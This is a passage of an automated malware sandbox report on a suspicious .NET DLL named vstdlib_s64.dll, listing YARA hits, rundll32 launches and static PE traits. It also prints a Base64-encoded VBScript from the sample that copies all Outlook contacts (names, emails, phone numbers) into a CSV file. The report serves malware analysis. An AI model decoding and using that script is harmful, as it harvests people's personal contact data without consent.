                        Source: Yara matchFile source: 0000000C.00000002.1803576304.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1806601416.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1805439876.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1683326542.000002596EF32000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2929241294.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1798302966.0000023D3F972000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1805465891.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1800394851.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1802596768.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1795862473.000002CAF50D2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1795742842.0000013F23772000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1799338023.000001EDF6DB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1794900321.0000024F7DFE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1798309140.000002D2EC852000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2926634464.0000020471362000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1711125446.0000024C76552000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1794101772.000001E0A1962000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1787872788.000001FBE5A92000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 796, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6200, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7112, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7120, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2496, type: MEMORYSTR
                        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\Data.logJump to behavior
                        Source: vstdlib_s64.dll.dllStatic PE information: invalid certificate
                        Source: vstdlib_s64.dll.dll, jnrUhiH.csBase64 encoded string: 'Q29uc3QgRm9yV3JpdGluZyA9IDIKClNldCBmcyA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJTY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIpClNldCBvZmlsZSA9IGZzLk9wZW5UZXh0RmlsZSgiQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1xjb250YXRvcy5jc3YiLCBGb3JXcml0aW5nLCBUcnVlKSAnIFRydWUgcGFyYSBjcmlhciBvIGFycXVpdm8gc2UgbsOjbyBleGlzdGlyCgpTZXQgb2wgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiT3V0bG9vay5BcHBsaWNhdGlvbiIpClNldCBteU5hbWVTcGFjZSA9IG9sLkdldE5hbWVTcGFjZSgiTUFQSSIpCgpTZXQgbXlDb250YWN0c0ZvbGRlciA9IG15TmFtZVNwYWNlLkdldERlZmF1bHRGb2xkZXIoMTApICcgMTAgw6kgbyB2YWxvciBwYXJhIGEgcGFzdGEgZGUgQ29udGF0b3MKU2V0IG15SXRlbXMgPSBteUNvbnRhY3RzRm9sZGVyLkl0ZW1zCgonIEVzY3JldmVyIG8gY2FiZcOnYWxobyBkbyBDU1YKb2ZpbGUuV3JpdGVMaW5lICJOb21lIENvbXBsZXRvLEVtYWlsLFRlbGVmb25lIENvbWVyY2lhbCxUZWxlZm9uZSBDZWx1bGFyIgoKRm9yIEVhY2ggaXRlbSBJbiBteUl0ZW1zCiAgICBJZiBpdGVtLkNsYXNzID0gNDAgVGhlbiAnIDQwIMOpIG8gdmFsb3IgcGFyYSBpdGVucyBkZSBjb250YXRvCiAgICAgICAgRGltIGZ1bGxOYW1lLCBlbWFpbCwgYnVzaW5lc3NQaG9uZSwgbW9iaWxlUGhvbmUKICAgICAgICBmdWxsTmFtZSA9IGl0ZW0uRnVsbE5hbWUKICAgICAgICBlbWFpbCA9IGl0ZW0uRW1haWwxQWRkcmVzcwogICAgICAgIGJ1c2luZXNzUGhvbmUgPSBpdGVtLkJ1c2luZXNzVGVsZXBob25lTnVtYmVyCiAgICAgICAgbW9iaWxlUGhvbmUgPSBpdGVtLk1vYmlsZVRlbGVwaG9uZU51bWJlcgoKICAgICAgICAnIFN1YnN0aXR1aXIgdmFsb3JlcyBudWxvcyBwb3Igc3RyaW5ncyB2YXppYXMKICAgICAgICBJZiBJc051bGwoZnVsbE5hbWUpIFRoZW4gZnVsbE5hbWUgPSAiIgogICAgICAgIElmIElzTnVsbChlbWFpbCkgVGhlbiBlbWFpbCA9ICIiCiAgICAgICAgSWYgSXNOdWxsKGJ1c2luZXNzUGhvbmUpIFRoZW4gYnVzaW5lc3NQaG9uZSA9ICIiCiAgICAgICAgSWYgSXNOdWxsKG1vYmlsZVBob25lKSBUaGVuIG1vYmlsZVBob25lID0gIiIKCiAgICAgICAgJyBFc2NyZXZlciBsaW5oYSBubyBDU1YKICAgICAgICBvZmlsZS5Xcml0ZUxpbmUgIiIiIiAmIGZ1bGxOYW1lICYgIiIiLCIiIiAmIGVtYWlsICYgIiIiLCIiIiAmIGJ1c2luZXNzUGhvbmUgJiAiIiIsIiIiICYgbW9iaWxlUGhvbmUgJiAiIiIiCiAgICBFbmQgSWYKTmV4dAoKb2ZpbGUuQ2xvc2UKClNldCBvbCA9IE5vdGhpbmcKU2V0IG9maWxlID0gTm90aGluZwpTZXQgZnMgPSBOb3RoaW5nCg=='
                        Source: classification engineClassification label: mal80.troj.spyw.evad.winDLL@38/2@4/4
                        Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll32.exe.logJump to behavior
                        Source: C:\Windows\System32\rundll32.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_03
                        Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\e4d6a6ec-320d-48ee-b6b2-fa24f03760d4
                        Source: vstdlib_s64.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: vstdlib_s64.dll.dllStatic file information: TRID: Win64 Dynamic Link Library (generic) Net Framework (111504/3) 44.42%
                        Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
                        Source: vstdlib_s64.dll.dllReversingLabs: Detection: 26%
                        Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll"
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashesJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashesJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePathJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashesJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashesJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePathJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintfJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpyJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_lengthJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncatJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintfJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlashJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDirJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashesJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: vstdlib_s64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: vstdlib_s64.dll.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: vstdlib_s64.dll.dllStatic PE information: Image base 0x180000000 > 0x60000000
                        Source: vstdlib_s64.dll.dllStatic file information: File size 7477096 > 1048576
                        Source: vstdlib_s64.dll.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x71de00
                        Source: vstdlib_s64.dll.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
